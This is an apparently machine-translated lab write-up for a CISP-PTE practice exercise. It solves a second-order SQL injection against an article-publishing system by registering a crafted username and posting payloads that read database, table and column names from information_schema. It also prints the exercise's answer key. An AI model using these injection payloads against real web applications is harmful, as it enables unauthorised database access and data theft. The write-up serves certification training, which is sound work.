CISP-PTE Practical exercises SQL Inject

Preface

I haven't sent you an article for a long time , Because I've been preparing CISP-PTE The test of , So in the practice of stepping up time , Recently, I found that SQL Injection is also a classic question type of secondary injection , I would like to share with you the method of doing questions .

One 、 Practical exercises SQL Inject

Because of this SQL The injection question is more troublesome , Explanation is troublesome , Just write this in an article first SQL Injection question , Later, we will update the explanation of new question types .

Two 、 Problem solving steps and methods

1. Find ways to solve problems

We can see from the meaning of the title , The answer is in our database , Just look for breakthroughs , Injection of statements , You can get the answer . Let's click in and see .

Discovery is an article publishing system . We're trying to log in once , Try with a weak password


Login failed , I can only register to have a look

Registered a hao,123 Users of , It is found that you can register

After going in , See the article published before , Now try to publish an article , See if there is any injection point

After filling in the data , Successfully inserted

Let's insert a garbled code and symbols to see

When we insert single quotation marks and comments , There is an error , Indicates that there is an injection point , Next, insert SQL Statement to inject .

2. perform SQL Injection of statements

At this time, we need to see what injection method is good , By looking at the question stem, I found , It's filtered out ’–' and # Number , And cannot be filled directly , Database information cannot be displayed after submission , At this time, we will think of the method of secondary injection , For injection SQL Query statement , The principle and method of secondary injection have been explained in the previous column of penetration test , You can look back .
（1） First register two accounts , My example is hao,*/‘hao’)#, The codes are all 123
The principle is , Here's the picture ：

The injection is completed by secondary injection and injection semi closure , First in */’1234ewq’);# Insert the article content into the browser ,poc As follows
AAA’,(select database()),/*

AAA’,(select group_concat(table_name) from information_schema.tables where table_schema like 0x32776562),/*

AAA’,(select group_concat(column_name) from information_schema.columns where table_schema like 0x32776562 and table_name like 0x61727469636C6531 ),/*

AAA’,(select group_concat(content) from (select * from article1 limit 0,1)as a ),/*

Return to normal user 1234ewq

Here's the answer , utilize // To comment on extra quotes , Cause what we insert select Statements can be displayed , Secondly, due to the secondary injection of users */’1234ewq’);# The user name finally inserted into the table is actually 1234ewq So it needs to be checked by normal users
Let's see the effect

Take advantage of the difficulty ：
First, mask the annotation #、–, However, the annotation is not masked at the time of registration , because mysql characteristic ,// The contents will be commented out , And insert into Table name value() Method needs to fill in the fields one by one , In other words, one more field is not enough , Not without one field ; And only 2/3 Field can be displayed , Therefore, first register a secondary injection user name , Then insert the user name into the statement with the help of secondary injection for special processing , formation
insert article1 value(’’,‘AAA’,(select database()),/’,’’,’/ ‘1234ewq’);#’)
In this way, inserting into the database will become like this
insert article1 value(’’,‘AAA’,(select database()), ‘1234ewq’)
The second is to query the fields after insertion , because article1 The same table name in the table will cause the database to loop , Report errors , Therefore, it is necessary to carry out as Alias , And if you don't join limit Statement restrictions , Then nothing can be exported ,limit Any value can

The above is a detailed online solution , Is to help everyone understand , Let me explain my method
Log on first */‘hao’)# account number , The principle of such a registered account , It's very clear , Just to comment out the quotation marks and commas before and after
（2） We log in and publish articles , The next step is to submit SQL Statement , Because the submission here is invisible , In fact, it is submitted to hao In your account
（3）SQL Manual injection method
select schema_name from information_schema.schemata（ Check the library ）
select table_name from information_schema.tables where table_schema= Library name （ Look up the table ）
select column_name from information_schema.columns where table_name= Table name （ List ）
select Name from Library name . Table name （ Check data ）

First check which libraries

Insert the success

Look at the tables in the Library

Insert the success

At this time , We can see from the result of the insertion that article1 surface

Next, let's look at the fields in the table


There are these fields in the table , At this time, the answer is most likely to appear in title and content On , So we began to check the data , Output all the data


We can see the answer is content In the field , And not the first line , But in a random line , So limit a few more rows of data .
The answer is ：key1:u9y8tr4n

summary

This way SQL The injection problem is resolved here , I hope you can have a good look at the problem-solving ideas and the method of secondary injection . It will be updated next time CISP-PTE Practical exercises for everyone .